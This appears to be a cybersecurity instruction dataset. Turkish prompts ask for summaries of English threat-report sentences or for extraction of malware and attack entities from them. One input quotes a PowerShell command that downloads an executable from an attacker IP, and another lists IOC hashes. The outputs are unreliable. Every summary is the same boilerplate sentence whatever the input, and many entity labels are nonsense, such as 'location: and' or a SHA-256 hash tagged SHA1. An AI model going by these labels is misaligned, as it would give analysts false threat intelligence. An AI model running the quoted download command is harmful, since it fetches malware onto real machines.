instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
While the terms page is on the screen, in the background the Trojan checks to see if the phone is attached to a network with one of the following mobile network codes (MNC): Each of these networks is Spanish, except for a single Australian network.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Reversing the file revealed that it was the PlugX loader, a remote access tool (RAT) that has been historically used in attacks targeting government-related industries and organizations.
malware: PlugX; location: remote; location: tool; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This group also has links to the original developers of H-Worm, also known as njRAT.
malware: njRAT
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
You can use keytool or openssl tools to view the certificate information.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In some cases, the key is split in half in the binary, so it is first reunited before being used.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Our research shows this operation to be only about four months old.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 3,317 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Two bugs are chained to achieve the remote code execution and for the attack to be successful, an attacker requires access to the Outlook Web App portal of the vulnerable Exchange Server, and a valid email address
SOFTWARE: Outlook Web App; SOFTWARE: Exchange Server
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Also, read about a data breach from IoT company Wyze that exposed information of 2.4 million customers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Please mark, I'm not a robot!
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Part of the dumped information contained the action of the user with administration roles on the system.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We promptly identify and remove any such content but have not observed any significant shifts from the normal levels of activity that occur in the region.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The following PowerShell command was used for this: powershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile c:\users\public\out1.exe -usebasicparsing
attack-pattern: PowerShell; tools: out1
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.
identity: TAG; threat-actor: Turla; SOFTWARE: Android; location: Russia; identity: Federal Security Service (FSB); identity: Ukrainian Azov Regiment
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
And so, when we talk about in terms of cyber conflict, cyber war, it has usually been in the context of just [00:02:00] another element within that 360-degree dominance that they hope to achieve in any conflict of war.
location: And; location: war; identity: just; location: hope; location: war
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
As a reminder, while investigating Earth Berberoka, we found multiple links to Iron Tiger that we detailed in our research.
threat-actor: Iron Tiger
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.
SOFTWARE: Google Play store; location: China
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Retrieves basic information like network information and MAC address from an infected phone SMS stealing Contacts stealing Audio recording GPS location retrieval Steals files with the specific extensions, although not all samples target these extensions.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
First it kills the msdt.exe process.
FILEPATH: msdt.exe
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Since the function highly depends on the actual “machine ID”, decryption on another machine that isn’t the original infected host is not viable, making malware analysis more difficult.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
1.a JS file Trojan.JS.SIDEWINDER.A Downloader.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
After logging in to the active directory server, the threat actor modifies the active directory server group policy object — this includes a request that all domain account members create a scheduled task and execute the malware.
attack-pattern: scheduled task; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We found several interesting dynamic DNS domains resolving to a server that was used to deliver SideWinder’s malicious documents.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A large number of hijacked channels were rebranded for cryptocurrency scam live-streaming.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Additionally, we encountered the ClamAV logo during one of the threat actor walkthrough videos – the same logo used on the HelloXD ransomware samples (Figure 22).
malware: HelloXD; SOFTWARE: ClamAV
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
While investigating the Confucius threat actor, we found a recent spear phishing campaign that utilizes Pegasus spyware-related lures to entice victims into opening a malicious document downloading a file stealer.
attack-pattern: spear phishing; malware: Pegasus
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Discord’s CDN is a user-created service that allows users to host attachments and is not malicious.
SOFTWARE: Discord
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Email us at u42comms@paloaltonetworks.com.
EMAIL: u42comms@paloaltonetworks.com
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
What can I do about it?
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.
location: Protection; location: and; threat-actor: Safe; location: protection
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We manually replicated the routine and commands for disabling the defense solutions to further look into the routine.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The header for a sample document can be seen below.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Google is alleging violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, the Electronic Communications Privacy Act, the Lanham Act, and tortious interference of business relationships, and unjust enrichment.
identity: Google
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
/up.txt 172.16
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
ERROR: type should be string, got " https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/ https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/ https://unit42.paloaltonetworks.com/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/ https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ https://unit42.paloaltonetworks.com/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/ https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/ https://unit42.paloaltonetworks.com/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/ https://unit42.paloaltonetworks.com/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/ https://unit42.paloaltonetworks.com/unit42-striking-oil-closer-look-adversary-infrastructure/ https://unit42.paloaltonetworks.com/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/ https://unit42.paloaltonetworks.com/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ https://attack.mitre.org/groups/G0059/ The Magic Hound campaign targeted energy, government, and technology organizations with spear-phishing emails as a delivery mechanism. These emails delivered macro-enabled Microsoft Office documents and PE files within attachments. The documents and executables attached to emails would install a variety of tools from portable PE files, .NET Framework PE files, Meterpreter, IRC bots, an open sourced Meterpreter module called Magic Unicorn, and an open sourced Python RAT called Pupy. The custom tools used in the Magic Hound campaign provided connections to other threat groups, such as the IRC Bot which was very similar to the Parastoo tool associated with the NEWSCASTER threat group."
URL: https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/; URL: https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/; URL: https://unit42.paloaltonetworks.com/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/; URL: https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/; URL: https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/; URL: https://attack.mitre.org/groups/G0059/; threat-actor: Magic Hound; location: campaign; location: energy; location: and; location: spear; attack-pattern: phishing; identity: Microsoft; tools: Office; location: and; location: and; malware: Meterpreter; malware: Meterpreter; location: and; threat-actor: Magic Hound; location: campaign; location: tool; threat-actor: NEWSCASTER
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It was downloaded from the same website as the sample in Table 5; however, it was targeted against an international law firm’s East Asian office, and uses a Google Code page identified in FireEye’s blog for C2, but an IP not listed in the blog post.
location: same; location: sample; location: international; location: law; tools: office; location: and; location: page; location: post
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Ed:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The exploit used in the wild contains two major parts, one is HTML which sets up the page to exploit, and the other is a Flash file which builds the memory layout in IE process and triggers the bug.
SOFTWARE: IE; SOFTWARE: Flash
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
SMS uploaded via HTTP in pcap The Taomike library makes contact with the following URLs, but only the “2c.php” path is used to capture SMS messages.
attack-pattern: capture SMS messages; FILEPATH: 2c.php; identity: Taomike
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Here are some tips on how to stay protected from email scams:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At the time, its development was a part-time effort by a security engineer named Chetan Nayak (aka Paranoid Ninja) living in India.
location: time; location: time; location: effort; location: security; identity: Paranoid Ninja
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If the targeted victims enable macros, then the malicious process continues.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This fake DLL library decrypts the main backdoor + stealer from the .tmp file in the same directory.
location: library; malware: stealer; location: same
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
TCP stream excerpt of the malware sending information to C&C server
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Deobfuscate/Decode Files or Information
attack-pattern: Deobfuscate/Decode Files or Information
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This makes them vulnerable to hacking and spear phishing.
location: them; location: and; attack-pattern: spear phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If we went even further, all three vulnerabilities are Use-After-Free bugs.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Access the unique identification number Access location information
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
How are you looking for visibility across all of your systems?
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The vendors that were targeted by VPNFilter were Asus, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZDE.
identity: QNAP; identity: ZDE; identity: Linksys; identity: MikroTik; malware: VPNFilter; identity: Asus; identity: D-Link; identity: Huawei; identity: Netgear; identity: TP-Link; identity: Ubiquiti
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We hope the information will help readers get a clear picture of current directions in ransomware trends.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
After some data collection we found more than 300 samples that correlate to the mentioned indicators that were recently very active our first detections occurred in August, with the campaign itself still ongoing (having occasional spikes in between).
TIME: August
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It was last updated on July 29, 2022.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
As such, not all samples may have the embedded resource that leaks the same OS language.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The handler for this message collects data from the victim’s device.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It can also be compromised through a patch or hotfix.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The purpose of this is to copy the Brute Ratel C4 code (x64 assembly) onto the stack eight bytes at a time and eventually reassemble it into a memory space for execution – a DLL with a stripped MZ header.
malware: Brute Ratel C4; location: assembly; location: time; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This threat actor first published stolen documents in April 2016.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The first line of defense is the IPS.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.
threat-actor: Charming Kitten; location: tool; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The producer of the NetWire WorldWiredLabs, states that the tool uses 256-bit AES encryption, which we found to be accurate.
malware: NetWire WorldWiredLabs
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 12.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
After looking at previous versions of this installer, we found that the first compromised version was 2.3.0, built on May 26, 2022, while the previous version (2.2.10, published on May 6, 2022) was clean.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We detected campaigns of fake downloads where threat actors have set up web pages to host malicious binaries.
attack-pattern: fake downloads; attack-pattern: host malicious binaries
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
During the first calendar year quarter of 2022, LockBit 2.0 persisted as the most impactful and the most deployed ransomware variant we observed in all ransomware breaches shared on leak sites.
threat-actor: LockBit 2.0; TIME: first calendar year quarter of 2022
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We remain committed to updating the community as we uncover these campaigns.
location: community; tools: uncover
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 7. Relationship between five additional backdoors used by DragonOK and their C2 servers in this campaign.
threat-actor: DragonOK; Infrastucture: C2 servers
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The victim ID will be stored in the “bps.key” file.
FILEPATH: bps.key
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.
location: war; location: lure; attack-pattern: phishing; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The list of modified tools the group used include Mimikatz, RAR compression tool, port mapping tool, and screen capture.
location: list; location: tool; location: tool; location: and; attack-pattern: screen capture
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
An analysis of these tools could be used to better understand what is happening or what has happened in the environment.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Command and Scripting Interpreter: Visual Basic – T1059.005 User Execution: Malicious Link – T1204.001 User Execution: Malicious File – T1204.002 Persistence, Privilege Escalation Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - T1547.001 Discovery Account Discovery: Domain Account - T1087.002 Credential Access Credentials from Password Stores: Credentials from Web Browsers – T1555.003 Command and Control Data Encoding: Standard Encoding – T1132.001 Defense Evasion Deobfuscate/Decode Files or Information - T1140 Indicators of Compromise Files File name SHA-256 Trend Micro Detection Name Description SharpChisel.exe 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2 HackTool.MSIL.Chisel.A SharpChisel tunneling tool PD64.dll ccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131 Trojan.Win64.PASSDUMP.A File used by HackTool.Win64.PassDump.AC PasswordDumper.exe 0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3 HackTool.Win64.PassDump.AC
location: and; attack-pattern: Scripting; attack-pattern: User Execution; attack-pattern: User Execution; attack-pattern: Privilege Escalation; location: Startup; attack-pattern: Account Discovery; location: and; attack-pattern: Data Encoding; location: Standard; location: Micro; SHA1: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2; location: tool; SHA2: ccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131; SHA2: 0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The campaigns were limited — in each case, we assess the number of targets was in the tens of users.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At this time, WildFire is able to correctly identify the samples associated with this campaign as malicious.
SOFTWARE: WildFire
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.
malware: HYPERSCRAPE; threat-actor: Charming Kitten
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.
attack-pattern: phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
For mitigating and responding to an attack, organizations must practice good cyber hygiene by updating software, implementing an allow listing, and enabling strong spam filters.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
shei1.jsp
FILEPATH: shei1.jsp
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Hancitor is a malware that focuses getting other malware onto the victim’s system.
malware: Hancitor
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
All Android apps must be digitally signed with a certificate from the developer.
SOFTWARE: Android
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.
attack-pattern: phishing; location: and; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When developing your cloud security architecture and strategy, it is important to always keep the ends in mind.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 12.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Because of this, we recommend that organizations focus on observing general information security best practices as described in the Mitigation Actions section above.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Computer info encrypted with AES256 key Figure 25.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Enforcing the principle of least privilege and implementing an app reputation system are just some of the best practices that can help mitigate threats.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Loading malware through drive-by downloads is so 2012: in 2017 it’s about drive-by mining attacks to earn cryptocurrencies.
TIME: 2012; TIME: 2017
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This type of attack can also be used to give malicious software total control over the device.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Ransomware will only continue to evolve.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Through the ASPX file, malicious actors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands through them.
SOFTWARE: Outlook Web App (OWA)
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When encrypting, it creates a block of data we named headData.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Navigating Gray Clouds: The Importance of Visibility in Cloud Security
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The browser then navigates to Gmail to begin the data collection.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The usage of the open-source frameworks also allows the group to develop new backdoor variants efficiently.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
pipeCommunication.Close(); }
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Defending against Confucius and Patchwork Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective.
threat-actor: Confucius; threat-actor: Patchwork; threat-actor: Confucius; threat-actor: Patchwork